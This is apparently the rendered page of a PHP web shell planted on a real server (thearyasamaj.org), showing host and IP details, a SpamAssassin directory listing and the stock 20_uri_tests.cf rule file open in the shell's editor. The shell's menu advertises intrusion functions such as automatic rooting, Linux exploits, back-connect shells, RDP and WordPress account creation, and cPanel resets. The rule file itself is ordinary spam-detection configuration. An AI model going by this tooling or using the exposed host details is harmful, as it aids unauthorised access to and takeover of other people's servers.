Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
spamassassin /
[ HOME SHELL ]
Name
Size
Permission
Action
10_default_prefs.cf
8.56
KB
-rw-r--r--
10_hasbase.cf
2.39
KB
-rw-r--r--
20_advance_fee.cf
7.43
KB
-rw-r--r--
20_aux_tlds.cf
36.27
KB
-rw-r--r--
20_body_tests.cf
7.01
KB
-rw-r--r--
20_compensate.cf
1.85
KB
-rw-r--r--
20_dnsbl_tests.cf
11.62
KB
-rw-r--r--
20_drugs.cf
15.16
KB
-rw-r--r--
20_dynrdns.cf
11.11
KB
-rw-r--r--
20_fake_helo_tests.cf
8.83
KB
-rw-r--r--
20_freemail.cf
2.99
KB
-rw-r--r--
20_freemail_domains.cf
40.27
KB
-rw-r--r--
20_freemail_mailcom_domains.cf
4.31
KB
-rw-r--r--
20_head_tests.cf
26.3
KB
-rw-r--r--
20_html_tests.cf
10.44
KB
-rw-r--r--
20_imageinfo.cf
5.17
KB
-rw-r--r--
20_mailspike.cf
2.86
KB
-rw-r--r--
20_meta_tests.cf
3.37
KB
-rw-r--r--
20_net_tests.cf
1.83
KB
-rw-r--r--
20_pdfinfo.cf
15.45
KB
-rw-r--r--
20_phrases.cf
7.96
KB
-rw-r--r--
20_porn.cf
2.01
KB
-rw-r--r--
20_ratware.cf
16.43
KB
-rw-r--r--
20_uri_tests.cf
5.87
KB
-rw-r--r--
20_vbounce.cf
20.28
KB
-rw-r--r--
23_bayes.cf
2.94
KB
-rw-r--r--
25_accessdb.cf
1.51
KB
-rw-r--r--
25_antivirus.cf
1.5
KB
-rw-r--r--
25_asn.cf
1.93
KB
-rw-r--r--
25_dcc.cf
2.87
KB
-rw-r--r--
25_dkim.cf
5.11
KB
-rw-r--r--
25_dnswl.cf
2.97
KB
-rw-r--r--
25_pyzor.cf
1.47
KB
-rw-r--r--
25_razor2.cf
3.07
KB
-rw-r--r--
25_replace.cf
20.92
KB
-rw-r--r--
25_spf.cf
4.29
KB
-rw-r--r--
25_textcat.cf
1.73
KB
-rw-r--r--
25_uribl.cf
18.2
KB
-rw-r--r--
30_text_de.cf
26.44
KB
-rw-r--r--
30_text_fr.cf
19.95
KB
-rw-r--r--
30_text_it.cf
1.81
KB
-rw-r--r--
30_text_nl.cf
20.97
KB
-rw-r--r--
30_text_pl.cf
17.39
KB
-rw-r--r--
30_text_pt_br.cf
42.84
KB
-rw-r--r--
50_scores.cf
36.66
KB
-rw-r--r--
60_adsp_override_dkim.cf
9.12
KB
-rw-r--r--
60_awl.cf
1.29
KB
-rw-r--r--
60_bayes_stopwords.cf
15.98
KB
-rw-r--r--
60_shortcircuit.cf
2.27
KB
-rw-r--r--
60_txrep.cf
1.31
KB
-rw-r--r--
60_whitelist.cf
10.11
KB
-rw-r--r--
60_whitelist_auth.cf
75.4
KB
-rw-r--r--
60_whitelist_dkim.cf
6.36
KB
-rw-r--r--
60_whitelist_spf.cf
3.45
KB
-rw-r--r--
60_whitelist_subject.cf
1.87
KB
-rw-r--r--
72_active.cf
483.61
KB
-rw-r--r--
72_scores.cf
28.04
KB
-rw-r--r--
73_sandbox_manual_scores.cf
4.04
KB
-rw-r--r--
STATISTICS-set0-72_scores.cf.t...
1.46
KB
-rw-r--r--
STATISTICS-set1-72_scores.cf.t...
1.46
KB
-rw-r--r--
STATISTICS-set2-72_scores.cf.t...
0
B
-rw-r--r--
STATISTICS-set3-72_scores.cf.t...
0
B
-rw-r--r--
languages
99.1
KB
-rw-r--r--
local.cf
3.22
KB
-rw-r--r--
regression_tests.cf
2.71
KB
-rw-r--r--
sa-update-pubkey.txt
4.67
KB
-rw-r--r--
sa-update.cron
3.33
KB
-rwxr--r--
user_prefs.template
1.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 20_uri_tests.cf
# SpamAssassin rules file: URI tests # # Please don't modify this file as your changes will be overwritten with # the next update. Use @@LOCAL_RULES_DIR@@/local.cf instead. # See 'perldoc Mail::SpamAssassin::Conf' for details. # # <@LICENSE> # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to you under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # </@LICENSE> # ########################################################################### require_version 3.004006 # possible IDN spoofing attack: https://web.archive.org/web/20141006091906/https://www.shmoo.com/idn/homograph.txt # not expecting any hits on this (yet) uri HIGH_CODEPAGE_URI /^https?:\/\/[^\/]*\&\#(?:\d{4,}|[3456789]\d\d);/i tflags HIGH_CODEPAGE_URI userconf ########################################################################### # Redirector URI patterns redirector_pattern /^http:\/\/chkpt\.zdnet\.com\/chkpt\/\w+\/(.*)$/i redirector_pattern /^http:\/\/www(?:\d+)?\.nate\.com\/r\/\w+\/(.*)$/i redirector_pattern /^http:\/\/.+\.gov\/(?:.*\/)?externalLink\.jhtml\?.*url=(.*?)(?:&.*)?$/i redirector_pattern /^http:\/\/redir\.internet\.com\/.+?\/.+?\/(.*)$/i redirector_pattern /^http:\/\/(?:.*?\.)?adtech\.de\/.*(?:;|\|)link=(.*?)(?:;|$)/i redirector_pattern m'^http.*?/redirect\.php\?.*(?<=[?&])goto=(.*?)(?:$|[&\#])'i redirector_pattern m'^https?:/*(?:[^/]+\.)?emf\d\.com/r\.cfm.*?&r=(.*)'i uri NUMERIC_HTTP_ADDR m{^https?://[\d.]+(?:[:/?\#]|$)}i describe NUMERIC_HTTP_ADDR Uses a numeric IP address in URL # Theo sez: # Have gotten FPs off this, and whitespace can't be in the host, so... # % Visit my homepage: http://i.like.foo.com % # Also ignore some bad parses like http://foo.bar%20http://foo.bar uri HTTP_ESCAPED_HOST /^https?\:\/\/[^\/\s\?\&\#\']*(?!%(?:20|3[cCeE])(?:https?:|mailto:))%[0-9a-fA-F][0-9a-fA-F]/ describe HTTP_ESCAPED_HOST Uses %-escapes inside a URL's hostname # look for URI with escaped 0-9, A-Z, or a-z characters (all other safe # characters have been well-tested, but are sometimes unnecessarily escaped # in nonspam; requiring "http" or "https" also reduces false positives). uri HTTP_EXCESSIVE_ESCAPES /^https?:\/\/\S*%(?:3\d|[46][1-9a-f]|[57][\da])/i describe HTTP_EXCESSIVE_ESCAPES Completely unnecessary %-escapes inside a URL # bug 1801 uri IP_LINK_PLUS m{^https?://\d+\.\d+\.\d+\.\d+.{0,20}(?:cgi|click|ads|id=)}i describe IP_LINK_PLUS Dotted-decimal IP address followed by CGI # allow ports 80 and 443 which are http and https, respectively # we don't want to hit http://www.cnn.com:USArticle1840@www.liquidshirts.com/ # though, which actually doesn't have a weird port in it. uri WEIRD_PORT m{https?://[^/?\s]+?:\d+(?<!:80)(?<!:443)(?<!:8080)(?:/|\s|$)} describe WEIRD_PORT Uses non-standard port number for HTTP # Matt Cline # Pretty good for most folks, except for jm: I have a really stupid # e-commerce bunch obfuscating their URLs with this for some reason. screw 'em # jm: hesitant to remove this outright; it should be good against phishers #uri HTTP_ENTITIES_HOST m{https?://[^\s\">/]*\&\#[\da-f]+}i #describe HTTP_ENTITIES_HOST URI obscured with character entities uri YAHOO_RD_REDIR m{^https?\://rd\.yahoo\.com/(?:[0-9]{4}|partner\b|dir\b)}i describe YAHOO_RD_REDIR Has Yahoo Redirect URI uri YAHOO_DRS_REDIR m{^https?://drs\.yahoo\.com/}i describe YAHOO_DRS_REDIR Has Yahoo Redirect URI # "www" hidden as "%77%77%77", "ww%77", etc. # note: *not* anchored to start of string, to catch use of redirectors uri HTTP_77 /http:\/\/.{0,2}\%77/ describe HTTP_77 Contains an URL-encoded hostname (HTTP77) # a.com.b.c uri SPOOF_COM2OTH m{^https?://(?:\w+\.)+?com\.(?!(?:[a-z]{2}\.)?s3\.amazonaws\.com|\w+\.psmtp\.com)(?:\w+\.){2}}i describe SPOOF_COM2OTH URI contains ".com" in middle # a.com.b.com uri __SPOOF_COM2COM m{^https?://(?:\w+\.)+?com\.(?!(?:[a-z]{2}\.)?s3\.amazonaws\.com|\w+\.psmtp\.com)(?:\w+\.)+?com\b}i meta SPOOF_COM2COM __SPOOF_COM2COM && !SPOOF_COM2OTH describe SPOOF_COM2COM URI contains ".com" in middle and end # a.net.b.com uri SPOOF_NET2COM m{^https?://(?:\w+\.)+?(?:net|org)\.(?!(?:[a-z]{2}\.)?s3\.amazonaws\.com)(?:\w+\.)+?com\b}i describe SPOOF_NET2COM URI contains ".net" or ".org", then ".com" uri URI_HEX m%^https?://[^/?&\#]*\b(?![0-9a-f]{0,12}[a-f]{3})[0-9a-f]{6,}\b%i describe URI_HEX URI hostname has long hexadecimal sequence uri URI_NOVOWEL m%^https?://[^/?&\#]*[bcdfgjklmnpqrstvwxz]{7}%i describe URI_NOVOWEL URI hostname has long non-vowel sequence tflags URI_NOVOWEL userconf # lock scores low uri URI_UNSUBSCRIBE /\b(?:gone|opened|out)\.php/i describe URI_UNSUBSCRIBE URI contains suspicious unsubscribe link # bug 3896: URIs in various TLDs, other than 3rd level www uri URI_NO_WWW_INFO_CGI /^(?:https?:\/\/)?[^\/]+(?<!\/www)\.[^.]{7,}\.info\/(?=\S{15,})\S*\?/i describe URI_NO_WWW_INFO_CGI CGI in .info TLD other than third-level "www" uri URI_NO_WWW_BIZ_CGI /^(?:https?:\/\/)?[^\/]+(?<!\/www)\.[^.]{7,}\.biz\/(?=\S{15,})\S*\?/i describe URI_NO_WWW_BIZ_CGI CGI in .biz TLD other than third-level "www" ########################################################################### uri NORMAL_HTTP_TO_IP m{^https?://(?!1(?:0|27|69\.254|72\.(?:1[6-9]|2\d|3[01])|92\.168)\.)\d+\.\d+\.\d+\.\d+\b(?![.-])}i describe NORMAL_HTTP_TO_IP URI host has a public dotted-decimal IPv4 address
Close
